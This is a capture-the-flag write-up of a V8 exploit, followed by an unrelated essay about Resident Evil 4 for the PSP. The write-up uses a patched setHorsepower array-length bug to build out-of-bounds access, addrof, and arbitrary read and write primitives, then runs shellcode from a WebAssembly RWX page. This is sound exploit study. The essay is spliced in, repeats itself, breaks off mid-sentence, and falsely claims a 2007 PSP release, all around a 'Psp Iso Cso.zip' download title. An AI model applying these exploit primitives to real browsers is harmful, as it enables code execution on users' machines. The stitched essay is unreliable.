Gotta go fast. server.py patch.txt
We are given the server.py python script, a d8 executeable and source code with a custom patch. I included the files directly relevant to the writeup above.
Looking at the provided patch, a very obvious vulnerability was introduced into v8. The patch adds a function called setHorsepower that allows us to set the length field of JSArray objects to a value of our chosing. The screenshot below showcases the relevant parts of the patch.
With this added vulnerability we can get an out of bounds read and write as showcased below. We start off by creating a JSArray object of type FixedDoubleArray. Next we use the setHorsepower function to increase its length to 0x100. We can now access out of bounds memory and both read and overwrite values stored on the v8-heap. We will now proceed to leverage this bug to take control of v8 and gain arbitrary code execution.
As you can see in the above screenshot, accessing arr[50] returned a float number due to the type of our array. Float numbers such as these are hard to interpret and use especially since they are oftentimes actually addresses that we would much rather view in hex. To accomplish this we will start by adding 2 helper functions.
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u32_buf = new Uint32Array(buf);
function ftoi(val) {
f64_buf[0] = val;
return BigInt(u32_buf[0]) + (BigInt(u32_buf[1]) << 32n);
}
function itof(val) {
u32_buf[0] = Number(val & 0xffffffffn);
u32_buf[1] = Number(val >> 32n);
return f64_buf[0];
}
The first helper function, ftoi, takes a value of type float and converts it to a BigInt value. The second helper function, itof, accepts a BigInt value as its argument and converts it to a float. This function will be important when trying to write values into memory.
Now that that is setup, our first goal will be to craft an addrof primitive. This primitive should allow us to pass in an arbitrary object and the function should return its address. We will accomplish this using our vulnerability.
var s = [1.1,2.2];
var obj = {"A":1};
var obj_arr = [obj];
var fl_arr = [3.3,4.4];
var tmp = new Uint8Array(8);
s.setHorsepower(0x100);
let obj_arr_elem = s[12];
function addrof(obj) {
obj_arr[0] = obj;
s[17] = obj_arr_elem;
return ftoi(fl_arr[0]) & 0xffffffffn;
}
We start by creating some objects, and using the vulnerable function to extend the length of our float array s. By accessing various indexes of the s array we can now read and overwrite arbitrary values stored after the s array. Our first step is to retrieve the elements pointer of our obj_arr. This will become vital for the upcoming addrof primitive.
For the addrof function, we start by setting the first index of our obj_arr to the value address we are trying to leak. Next we use our vulnerability to overwrite the elements pointer of fl_arr with the elements pointer of our object array. This makes it so fl_arr[0] now points to the address we just stored in the obj_arr. Finally we use ftoi to return the value with type BigInt. Like this we successfuly managed to create a primitive that allows us to retrieve the addresses of our objects.
As you may have spotted in the above screenshot, we did not in fact leak the entire address of the passed in object. We only got the lower 4 bytes. This is due to a v8 concept called pointer compression. To save space, only the lower 4 bytes of addresses are stored on the v8 heap. Since the upper 4 bytes are always the same throughout a specific v8 process, this address is instead stored in the r13 register. We will need to find a way to leak this value too if we want to successfuly leak object addresses.
In the beginning of our exploit we executed 'var tmp = new Uint8Array(8);' to allocate a specific object. As it turns out, this object actually stores the root address in memory, so we can simply leak it by accessing s[32];
We now have everything needed to proceed with our next primitives. To be more specific, we want an arbitrary read and write. There are multiple ways to achieve this, but I decided to accomplish this primitive via a pair of ArrayBuffers.
function arb_read(obj,offset) {
dv_1.setUint32(0, Number(addrof(obj)-1n+offset), true);
return dv_2.getUint32(0, true);
}
function arb_write(addr,val) {
w[21] = itof(BigInt(part_2)>>32n);
dv_1.setUint32(0, Number(addr), true);
dv_2.setUint32(0, val, true);
}
var w = [1.1,2.2];
w.setHorsepower(0x100);
var arr_1 = new ArrayBuffer(0x40);
var dv_1 = new DataView(arr_1);
var arr_2 = new ArrayBuffer(0x40);
var dv_2 = new DataView(arr_2);
w[6] = itof((addrof(arr_2)+0x10n + 3n)<<32n);
w[7] = itof(BigInt(root_leak)>>32n);
w[21] = itof(BigInt(root_leak)>>32n);
Once again we start by allocating an arr w and extend its length using the vulnerable function to achieve an index read/write. Next we allocate 2 arraybuffers and their dataview objects.
In JSArrayBuffer objects, the backing store points to their elements. These elements can then be viewed and edited using the getUint32() and setUint32() functions. This means that if we overwrite the backing store pointer of arr_1 with the address of the backing store pointer of arr_2, we can execute 'dv_1.setUint32(addrof(obj));' to write an arbitrary address to the backing store pointer of arr_2. We can now use dv_2.(get/set) to complete our arbitrary read and write primitives by using the pointer received from arr_1.
We now have all of our primitives together. The last thing needed is a way to obtain code execution. With our primitives, the easiest way to achieve this is through shellcode and webassembly.
let wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,...]);
let wasm_module = new WebAssembly.Module(wasm_code);
let wasm_instance = new WebAssembly.Instance(wasm_module);
let pwn = wasm_instance.exports.main;
When creating a wasm function as demonstrated above, a RWX page is created in memory. This address is then stored at wasm_instance + 0x68.
To complete our exploit, we start by leaking the address of the rwx page using our arb_read() function on wasm_instance + 0x68. Next we call copy_shellcode() to copy our shellcode over to this page step by step using arb_write(). Finally we execute the '/bin/cat ./flag.txt' shellcode to retrieve the flag and complete the challenge.
The full exploit script is posted below.
The PSP port of Resident Evil 4 presented several challenges for developers. The PSP's hardware limitations, compared to its console and PC counterparts, necessitated significant graphical downgrades. The game's visuals were reduced in resolution, and some effects were omitted to ensure smooth gameplay. Despite these concessions, the PSP version still maintained the core elements that made Resident Evil 4 a hit.
The PSP version of Resident Evil 4, available in ISO and CSO formats, offers a unique experience for fans of the series and survival horror enthusiasts. While the game's availability as a zip file raises concerns about digital piracy and copyright infringement, it also highlights the challenges of managing digital rights and the evolving landscape of game distribution. As technology advances, the ways in which we access and play games continue to shift, making it essential for developers, publishers, and gamers to adapt to these changes. Resident Evil 4 Psp Iso Cso.zip
The distribution of Resident Evil 4 PSP as an ISO or CSO file, packaged in a zip archive, raises questions about copyright infringement and digital piracy. While digital distribution platforms, like the PlayStation Store, offer legitimate ways to purchase and download PSP games, the internet's vast and largely unregulated nature facilitates the sharing of copyrighted materials, including games. The zip file format allows for easy compression and sharing of large files, making it a popular choice for distributing pirated copies of games. The PSP port of Resident Evil 4 presented
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The PSP uses the Universal Media Disc (UMD) format for its games, but with the advent of custom firmware and homebrew, ISO and CSO (Compressed ISO) formats became popular alternatives. These formats allow for the distribution and playback of PSP games on custom firmware-enabled devices, often reducing file sizes and enabling faster loading times. The ISO format is an uncompressed image of the UMD, while CSO is a compressed version, making it more convenient for distribution. Despite these concessions, the PSP version still maintained
Resident Evil 4 is widely regarded as a revolution in the survival horror genre. Its over-the-shoulder third-person shooter gameplay mechanics, coupled with a strong emphasis on exploration and puzzle-solving, set a new standard for horror games. Players take on the role of Leon S. Kennedy, a government agent tasked with rescuing President R. D. Ashford's daughter, Ashley, from a mysterious cult in rural Spain. The game's atmosphere, tense combat, and intense plot twists have made it a classic among gamers.
Resident Evil 4, a survival horror game developed and published by Capcom, was initially released in 2005 for the Nintendo GameCube. The game's critical and commercial success led to its re-release on various platforms, including the PlayStation Portable (PSP). The PSP version of Resident Evil 4 was released in 2007, allowing players to experience the game's intense action and horror elements on a portable console. This essay will explore the PSP version of Resident Evil 4, specifically focusing on the ISO and CSO formats, and the implications of distributing the game as a zip file.